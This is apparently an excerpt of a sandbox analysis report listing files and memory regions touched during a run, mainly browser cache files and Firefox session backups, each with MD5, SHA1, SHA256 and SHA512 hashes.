SHA512 be47b200cc40a77eaf0eb730df220e68f617cdd649720f2e0443ba8749da2cb1ceac5181881f3aec9d851095fd195e6e0db170ea9750bac69a147c93d768f274

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\M5JLJ3LG\css2[1].css

MD5 5912f3bba71c222672dfa244a60acef0
SHA1 317a49729bb8654c3986e6b32278258a1d692d81
SHA256 48708ab3b01bc53a736f7f85e0badd9174872faa981e78b32c16c4efcaa59d99
SHA512 770f13af0d6ebe7ff9d925efccd05b0b2e5afd5fbe19770562d88936d541a298a49aea028f5122a255fb5026b4a5f37c0cf52831212ecaaf378a5769ff0379f7

memory/2340-1645-0x0000029A34C50000-0x0000029A34D50000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\AOQRPCUP\network[1].js

MD5 a36f25447b3d55d31fdfdc30fa31c3f6
SHA1 81154e36fdda94a482fb7f079ef683fa3af68f1b
SHA256 1432216f926190d39c5e9b17f38a4e075c692650eddb3df32e2a55d6b3eb6f9f
SHA512 2b396c5f278953dfb1ffa324e35150cd375218cc993510fc1643df68847d7d951efe2208423fd8f467a46f4b14fd8b3d7af06c7d24ab8f1753789cfc920587fe

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\AOQRPCUP\spf[1].js

MD5 9df260ef5f689e597011f8a110bf0156
SHA1 7cf9959f50ee5c0eb7653cd7b9d56e9e13c61325
SHA256 8e184352e6a0026e43c829910615fc408a900dad2f388d1b284756d1a7b0b62e
SHA512 099ea70bc08630b933e83c3033ae049c19940ca9e8f0eb42eb764552a9649493606eab56f683aa72df356ef53a9b37a63493a349e86a098fa82aa0ef75387cd8

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\AOQRPCUP\base[1].js

MD5 99d94118b126f0e6fa930656e9aeec5f
SHA1 fde794b877a215638b07225c393d23d93d090169
SHA256 d23c0ec3c06e663c17df265a07da5a6a5d0ced529cbf10c842df6cc9934867d7
SHA512 0aa8e01192ac2f7eda8ac27c1ae67cd2c2e8b927a567578b6575a86892183e2a0d9de6d09b907152dac18a67fe041d1a4948d762fb29cc23b960e1ddc954d2b9

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\AOQRPCUP\rs=AGKMywH7OenIozOPso_R4eAze85u9ntbZg[1].css

MD5 0d4df52d0ae450290f831b5e296fc4d1
SHA1 673b85f8dd75d27097fdab6c6a4e724e07cf2099
SHA256 c9b7d2799f5544c71e7a43c890952f0b7edf08ba5fe83fa05b4ef5c901590251
SHA512 865107ca766a23b888a190ccfbf7c63e5bf4b8d42102baf4b0558e9b137ee25b19800d7d91a60ad2d3f28f33772daddc67d5430d9f50bdd918fa810c2a37d0d8

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LLA4BR6N\www-onepick[1].css

MD5 9ace9ca4e10a48822a48955cbd3f94d0
SHA1 1f0efa2ee544e5b7a98de5201fb8254b6f3eb613
SHA256 f8fdbb9c5cdceb1363bb04c5e89b3288ea30d79ef1a332e7a06c7195dd2e0ec4
SHA512 25354aeecb224fd6d863c0253cd7ad382dce7067f4147790ee0ce343f8c3e0efb84e54dd174116e7ad52d4a7e05735039fa1085b739abbe80f9e318e432eed73

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\OQZLHADN\www-main-desktop-player-skeleton[1].css

MD5 2a5f27d8d291d864d13eaa1f5cd9cd51
SHA1 b39f9b99b924e5251ac48fad818d78999cfd78d4
SHA256 056232b6127143e2f8bf4218db355d978e1e96f5dedcce59a9f5d6ab92b437f1
SHA512 1b54f1e13cb38e41f2a65db3cdc2bc702a9e963751b1ef0338d67b95816441b0143e1d4dabc99f276a04f9c00570bb8933f1bd87394998b3878c268b08ecf24a

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\OQZLHADN\www-main-desktop-watch-page-skeleton[1].css

MD5 64c8e3b11cfffc8ebf2240e4f46ab492
SHA1 71276680811731f983502e477a87e87cfe72d75f
SHA256 3acc199c41eb3c884ee9884c15e6b78975499be2255aa203dba38ef24440181c
SHA512 497a48233bb198e05517e2cba003c2c5ba25183e1654b5b8252b9823f0859497ccab66a77e243238b27ea6eb826ae4fc72efb2f32b2b378edee7f9dfb87f4756

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\LLA4BR6N\www-player[1].css

MD5 c0aca454c0a9b539d3af1213a20c6625
SHA1 9893a760290f6d8a9fed3a9f3129e7285b702430
SHA256 13a3fa279a6816ddd952f42fd82f5bc170ac2ff89410d14d43954b342ad40040
SHA512 bc26522c0a1fd3f40af510ab903431c61a990e06cbc63e8806d30acb52414d6962b4ca51faff78d3a77bf9fae058b5343c29e033b42b7c7f277dad919dd6d8be

C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_94792986739A07D7C677389B609C9549

MD5 edcd426c2e88836cd13c98a8fb009401
SHA1 6d04f9da8e87fd36deed8fb9a72e0e780be22134
SHA256 597d4309cb9dfff967d65d844b63a2562bd97283daa0cc7c143e44c07fde22af
SHA512 439685606ddd9a6f0557ca76d7e59adbbd659555ffaf6e0dcaa278e7c9cf2588c090a70fa97dab43cb918b8d283c9813f7fae6cb7bc8736f076e22b3fcb59e33

memory/4892-1657-0x0000023CBFD00000-0x0000023CBFE00000-memory.dmp

memory/4892-1666-0x0000023CBF6F0000-0x0000023CBF6F2000-memory.dmp

memory/4892-1662-0x0000023CBF690000-0x0000023CBF692000-memory.dmp

memory/4892-1660-0x0000023CBF630000-0x0000023CBF632000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 c9f2074a81023775dd918279e488626e
SHA1 19a0c7439858e11dd43b7e683afaa04a862a8a41
SHA256 34469333142007c2d4598929fbbd342170d68612a41b0ea3915f0747c1dca02b
SHA512 91165d8f9f90953ee17c0071a0c3f60f3649ca99e073b7b0089add712d69acf01719c0f919280ca6b61e38048227da985f1f02dfeac23438a3179770eb3650f1

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\LICIZUQP\edgecompatviewlist[1].xml

MD5 d4fc49dc14f63895d997fa4940f24378
SHA1 3efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512 cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore-backups\recovery.jsonlz4

MD5 890d8371cf2eaee04f8238eb0a5638a9
SHA1 588c2d4a23d9d0b6bd54f0f9b19100bfeba8d7bb
SHA256 85de9e4b55ed2c4fd693587e3936ff589c1486100a567d0b1b84502421d9eb10
SHA512 2fc10aa17765ccd6d103d90c31721230bf9269b25a6bd9e749c9e6f6123dcf7d0e3260c2ce3a459b67c1d0c1219ee6609fcabf77564d6a908f35ed9af79cc601